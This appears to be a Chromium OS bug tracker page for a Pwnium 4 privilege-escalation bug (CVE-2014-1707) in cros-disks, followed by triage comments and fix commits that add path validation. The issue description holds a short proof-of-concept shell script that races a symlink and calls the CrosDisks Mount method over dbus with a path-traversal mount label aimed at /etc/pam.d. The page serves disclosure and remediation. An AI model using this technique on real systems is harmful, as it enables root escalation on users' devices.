New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 351811 link

Starred by 2 users

Issue metadata

Status: Verified
Owner:
Closed: Mar 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Chrome
Pri: 1
Type: Bug-Security

Blocking:
issue 351788



Sign in to add a comment

Security: Pwnium 4 GeoHot bug: cros-disks accepts labels, has path traversal issues.

Project Member Reported by jorgelo@chromium.org, Mar 12 2014

Issue description

ln -s /tmp/condo/a/a/a /tmp/condo/symlink 2> /dev/null &

dbus-send --system --type=method_call --dest=org.chromium.CrosDisks
/org/chromium/CrosDisks org.chromium.CrosDisks.Mount \
string:"$TARBALL" \
string:"" array:string:"mountlabel=../../tmp/condo/symlink/../../../etc/pam.d" &

rm -rf /tmp/condo/symlink &
mkdir /tmp/condo/symlink &
# mount needs to happen here
# AND IT DOES SOMETIMES!
rm -rf /tmp/condo/symlink &
 
Blocking: chromium:351788
Cc: -benchan@chromium.org jorgelo@chromium.org
Owner: benchan@chromium.org
Ben has graciously offered to own this one.

Comment 3 by sumit@chromium.org, Mar 12 2014

Cc: olofj@chromium.org wad@chromium.org sumit@chromium.org
Status: Assigned
Status: Started
Beyond mountlabel, filesystem label can be exploited.

Comment 6 by sumit@chromium.org, Mar 12 2014

Cc: cmasone@chromium.org
Project Member

Comment 7 by bugdroid1@chromium.org, Mar 13 2014

Project: chromiumos/platform/cros-disks
Branch : master
Author : Ben Chan <benchan@chromium.org>
Commit : 20fd4336509af27e1c0d86e937ea4680109c55a3

Code-Review  0 : Will Drewry, chrome-internal-fetch
Code-Review  +2: Ben Chan, Jorge Lucangeli Obes, Kees Cook
Commit-Queue 0 : Jorge Lucangeli Obes, Kees Cook, Will Drewry, chrome-internal-fetch
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes, Kees Cook, Will Drewry, chrome-internal-fetch
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : I7a880818a565820c6549a9b127292cad178b010b
Reviewed-at    : https://chromium-review.googlesource.com/189715

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Project Member

Comment 8 by bugdroid1@chromium.org, Mar 13 2014

Project: chromiumos/platform/cros-disks
Branch : stabilize-5116.115.B
Author : Ben Chan <benchan@chromium.org>
Commit : 0bd6d4f079db893ed4b884d4a5c70d3d4393ba45

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : Ie67a6ce8b7d97a64a0c8576c508660b2bac4a39c
Reviewed-at    : https://chromium-review.googlesource.com/189761

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Project Member

Comment 9 by bugdroid1@chromium.org, Mar 13 2014

Labels: M-33
Project: chromiumos/platform/cros-disks
Branch : release-R33-5116.B
Author : Ben Chan <benchan@chromium.org>
Commit : a41cb97fa5312150d29c822f8928fe9eca589b89

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : Ibdb15de39ce0e9e9364bf1528cbc9ed7af6569b7
Reviewed-at    : https://chromium-review.googlesource.com/189763

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Project Member

Comment 10 by bugdroid1@chromium.org, Mar 13 2014

Labels: M-34
Project: chromiumos/platform/cros-disks
Branch : release-R34-5500.B
Author : Ben Chan <benchan@chromium.org>
Commit : bd89ed1ddaf6bd861947c0c900c40420fca6d70a

Code-Review  0 : Ben Chan
Code-Review  +2: Jorge Lucangeli Obes
Commit-Queue 0 : Jorge Lucangeli Obes
Commit-Queue +1: Ben Chan
Verified     0 : Jorge Lucangeli Obes
Verified     +1: Ben Chan
Commit Queue   : Chumped
Change-Id      : I9558e2780c2318adc7d2eb3ec77b1c3ac7c1dd28
Reviewed-at    : https://chromium-review.googlesource.com/189762

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

cros_disks_server.cc
mount_manager.cc
mount_manager.h
mount_manager_unittest.cc
platform.cc
platform.h
platform_unittest.cc
Labels: Iteration-101 M-35 Cr-OS-Systems
Status: Fixed
Labels: Release-2-M33
Labels: -Release-2-M33 Release-3-M33
Cc: deepakg@chromium.org
Labels: CVE-2014-1707

Comment 16 by k...@google.com, Mar 14 2014

Cc: kamakshi@chromium.org
Labels: Security_Impact-Beta Security_Impact-Stable
Labels: Security_Severity-Critical
Root escalation.
Labels: -Security_Severity-Critical Security_Severity-High
High for root escalation.
Cc: ka...@chromium.org
Cc: scottz@chromium.org

Comment 22 by ka...@chromium.org, Mar 14 2014

Status: Verified
Cc: mbevand@google.com
Project Member

Comment 24 by ClusterFuzz, Jun 19 2014

Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.
Project Member

Comment 25 by sheriffbot@chromium.org, Mar 22 2016

Labels: -security_impact-beta
Project Member

Comment 26 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 27 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

Labels: Restrict-View-SecurityNotify
Labels: allpublic
Project Member

Comment 30 by sheriffbot@chromium.org, Oct 3 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE_description-submitted
Project Member

Comment 32 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-stabilize-5116.115.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45

commit 0bd6d4f079db893ed4b884d4a5c70d3d4393ba45
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:41:46 2014

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: Ie67a6ce8b7d97a64a0c8576c508660b2bac4a39c
Reviewed-on: https://chromium-review.googlesource.com/189761
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/cros_disks_server.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform.h
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/platform_unittest.cc
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager.h
[modify] https://crrev.com/0bd6d4f079db893ed4b884d4a5c70d3d4393ba45/mount_manager_unittest.cc

Project Member

Comment 33 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-release-R34-5500.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/bd89ed1ddaf6bd861947c0c900c40420fca6d70a

commit bd89ed1ddaf6bd861947c0c900c40420fca6d70a
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:42:22 2014

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: I9558e2780c2318adc7d2eb3ec77b1c3ac7c1dd28
Reviewed-on: https://chromium-review.googlesource.com/189762
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/cros_disks_server.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform.h
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/platform_unittest.cc
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager.h
[modify] https://crrev.com/bd89ed1ddaf6bd861947c0c900c40420fca6d70a/mount_manager_unittest.cc

Project Member

Comment 34 by bugdroid1@chromium.org, Jun 28

Labels: merge-merged-release-R33-5116.B
The following revision refers to this bug:
  https://chromium.googlesource.com/chromiumos/platform/cros-disks/+/a41cb97fa5312150d29c822f8928fe9eca589b89

commit a41cb97fa5312150d29c822f8928fe9eca589b89
Author: Ben Chan <benchan@chromium.org>
Date: Thu Mar 13 01:42:43 2014

Validate source and mount path.

This CL add validations of the source and mount path to ensure:
1. The source path is fully canonicalized before being checked by the
   CanMount() method of a mount manager.
2. The mount path must be an immediate child of the mount root
   directory of a mount manager.

BUG= chromium:351811 
TEST=Tested the following:
1. Build and run unit tests.
2. Run the following tests:
   - platform_CrosDisksDBus
   - platform_CrosDisksFilesystem
   - platform_CrosDisksArchive
3. Verify that Files.app can mount an external USB drive.
4. Verify that Files.app can open a ZIP file from:
   - user's Downloads directory
   - an external USB drive
   - within another ZIP file
   - Drive

Change-Id: Ibdb15de39ce0e9e9364bf1528cbc9ed7af6569b7
Reviewed-on: https://chromium-review.googlesource.com/189763
Reviewed-by: Jorge Lucangeli Obes <jorgelo@chromium.org>
Commit-Queue: Ben Chan <benchan@chromium.org>
Tested-by: Ben Chan <benchan@chromium.org>

[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/cros_disks_server.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform.h
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/platform_unittest.cc
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager.h
[modify] https://crrev.com/a41cb97fa5312150d29c822f8928fe9eca589b89/mount_manager_unittest.cc

Project Member

Comment 35 by sheriffbot@chromium.org, Jul 29

Labels: -Pri-0 Pri-1

Sign in to add a comment